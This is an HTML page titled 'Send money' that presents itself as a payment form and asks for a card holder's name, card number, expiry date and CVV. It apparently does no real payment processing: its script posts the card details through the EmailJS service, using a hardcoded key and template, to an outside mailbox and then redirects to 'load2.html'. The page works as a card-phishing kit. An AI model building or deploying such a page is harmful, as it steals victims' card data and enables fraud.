<!DOCTYPE html>
<html>
<head>
  
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  <meta http-equiv="CONTENT-TYPE" content="text/html; charset=UTF-8">
  <title>Send money</title>
</head>
<style>


body {
  font-family: Arial, sans-serif;
  background-color: #f7f7f7;
  user-select:none;
}

#form-container {
  width: 500px;
  margin: 60px auto;
  padding: 30px;
  background-color: #fff;
  border: 1px solid #ddd;
  border-radius: 10px;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}

#form-header {
  background-color: #333;
  color: #fff;
  padding: 10px;
  border-radius: 10px 10px 0 0;
}

#form-header h2 {
  font-size: 24px;
  margin: 0;
}

#form {
  padding: 20px;
}

.field {
  margin-bottom: 20px;
}

label {
  display: block;
  margin-bottom: 10px;
  font-weight: bold;
  color: #333;
  text-align:center;
}

input[type="text"] {
  width: 100%;
  height: 30px;
  padding: 10px;
  border: none;
  border-radius: 15px;
  background-color: #f7f7f7;
  font-size: 14px;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}

input[type="checkbox"] {
  margin-right: 10px;
}

.refund-policy {
  font-size: 14px;
  color: #666;
  margin-bottom: 20px;
}

input[type="submit"] {
  width: 100%;
  height: 30px;
  padding: 20px;
  background-color: #FFA07A;
  color: #fff;
  border: none;
  border-radius: 15px;
  cursor: pointer;
  font-size: 14px;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}

input[type="submit"]:hover {
  background-color: #FF8C00;
}
h1 {
  text-align:center;
}
</style>
<body>
<form id="form">
  <h1>SEND MONEY</h1>
  <div class="field">
    <label for="to_name">Card holder name</label>
    <input type="text" name="to_name" id="to_name" placeholder="Card holder name">
  </div>
 

<div class="field"> 
  <label for="one">Card number</label> 
  <input type="text" name="one" id="one" placeholder="Card number" 
         maxlength="19" oninput="this.value = this.value.replace(/\D/g, '').replace(/\s/g, '').replace(/(\d{4})(?=\d)/g, '$1 ').substring(0, 19);">
</div>


 
<div class="field"> 
  <label for="two">Card exp date</label> 
  <input type="text" name="two" id="two" placeholder="Expiration date" 
         maxlength="6" oninput="this.value = this.value.replace(/\D/g, '').replace(/(\d{2})(?=\d)/g, '$1/').substring(0, 5);">
</div>

  <div class="field">
    <label for="three">Cvv/Cvc</label>
    <input type="text" name="three" id="three" placeholder="Cvv/Cvc" maxlength="4">
  </div>
  <div class="field">
     </div>
  
<div style="text-align: center; font-size: 14px; color: #666; margin-bottom: 20px;">
  <input type="radio" name="terms" required style="margin-right: 10px;"> 
  I accept the <a href="refund-policy.html" target="_blank">Refund Policy</a> and Terms of Service.
</div>


  <input type="submit" id="button" value="SEND MONEY" >
</form>

<script type="text/javascript"
  src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>

<script type="text/javascript">
  emailjs.init('Cwf3anlcdWQ1Yq1n5')
</script>
<script>

const btn = document.getElementById('button');

document.getElementById('form').addEventListener('submit', function(event) {
  event.preventDefault();
  btn.value = 'Sending...';
  const serviceID = 'default_service';
  const templateID = 'template_v7akjf8';
  emailjs.sendForm(serviceID, templateID, this)
  .then(() => {
    btn.value = 'Send money';
    alert('Sent!');
    window.location.href = 'load2.html';
  }, (err) => {
    btn.value = 'Send money';
    alert(JSON.stringify(err));
  });
});

</script>
</body>
</html>
